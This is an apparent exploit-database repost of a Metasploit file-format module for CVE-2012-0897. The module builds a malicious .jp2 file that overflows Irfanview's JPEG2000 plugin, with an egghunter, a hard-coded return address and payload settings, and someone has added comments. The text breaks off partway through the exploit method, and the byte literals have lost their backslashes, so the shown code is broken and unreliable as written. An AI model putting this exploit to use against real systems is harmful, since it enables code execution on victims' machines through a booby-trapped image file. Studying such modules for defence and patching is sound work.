Home / exploits Irfanview JPEG2000 4.3.2.0 jp2 Stack Buffer Overflow
Posted on 03 July 2012
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

# File-format module for CVE-2012-0897: a stack-based buffer overflow in the
# JPEG2000.dll plugin shipped with Irfanview <= 4.3.2.0 (see 'Description').
# The module produces a .jp2 file (FILENAME option, default 'msf.jp2') through
# Msf::Exploit::FILEFORMAT and relies on Msf::Exploit::Remote::Egghunter,
# which the description says is used for stability.
#
# Defender notes grounded in the metadata below: the single target is tied to
# a hard-coded return address in i_view32.exe of the 4.32 build, and the
# vulnerable range is bounded by the 'Name'/'Description' (<= 4.3.2.0), so a
# later Irfanview/plugin release is the mitigation recorded here. The default
# post-exploitation action is 'InitialAutoRunScript' => 'migrate -f'.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata (name, references, target, payload constraints)
  # and the FILENAME option. Payload space is 4000 bytes with NOPs disabled.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
      'Description'    => %q{
This module exploits a stack-based buffer overflow vulnerability in version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been tested on a specific version of irfanview (v4.3.2), although other versions may work also. The vulnerability is triggered via parsing an invalid qcd chunk structure and specifying a malformed qcd size and data. Payload delivery and vulnerability trigger can be executed in multiple ways. The user can double click the file, use the file dialog, open via the icon and drag/drop the file into Irfanview's window. An egg hunter is used for stability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Parvez Anwar <parvez[at]greyhathacker.net>', # vulnerability discovery
          'mr_me <steventhomasseeley[at]gmail.com>',    # msf-fu
          'juan vazquez'                                # more improvements
        ],
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2012-0897' ],
          [ 'OSVDB', '78333'],
          [ 'BID', '51426' ],
          [ 'URL', 'http://www.greyhathacker.net/?p=525' ],
        ],
      'Platform'       => [ 'win' ],
      'DefaultOptions' =>
        {
          'EXITFUNC'             => 'process',
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'Space'       => 4000,
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          # push esp; retn [i_view32.exe]
          # http://www.oldapps.com/irfanview.php?old_irfanview=7097
          # http://irfanview.tuwien.ac.at/plugins/irfanview_plugins_432_setup.exe
          # A fixed address in the main executable: the target entry is only
          # valid for the exact 4.32 build named here.
          [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ]
        ],
      'DisclosureDate' => 'Jan 16 2012',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The output file name.', 'msf.jp2']),
      ], self.class)
  end

  # Swaps every adjacent pair of bytes in raw_bytes ("unicode-like" ordering
  # without inserting nulls): for each even index i the output receives
  # raw_bytes[i+1] followed by raw_bytes[i]. An empty string yields "".
  # NOTE(review): the length is not checked; for odd-length input the last
  # iteration reads raw_bytes[i+1] past the end (nil), which String#<< rejects
  # with a TypeError, so callers must supply an even number of bytes.
  def encode_bytes(raw_bytes)
    encoded_bytes = ""
    0.step(raw_bytes.length-1, 2) { |i|
      encoded_bytes << raw_bytes[i+1]
      encoded_bytes << raw_bytes[i]
    }
    return encoded_bytes
  end

  # Builds the .jp2 container, starting with the JP2 signature and file-type
  # boxes. NOTE(review): in this copy the string literals read "x00x00..." —
  # the backslashes of the original escapes appear to have been lost in
  # extraction (the trailing comment gives the intended magic as 0x6a502020);
  # compare against the upstream module before relying on this text.
  # The remainder of this method lies outside this excerpt.
  def exploit
    jp2 = ""
    jp2 << "x00x00x00x0c" #
    jp2 << "x6ax50x20x20" # [jP ] <0x6a502020> magic 0xd0a870a,len 12
    jp2 << "x0dx0ax87x0a" #
    jp2 << "x00x00x00x14" #
    jp2 << "x66x74x79x70" #
    jp2 << "x6ax70x32x20" #
    jp2 << "x00x00x00x00" # MinorVersion = 0 = [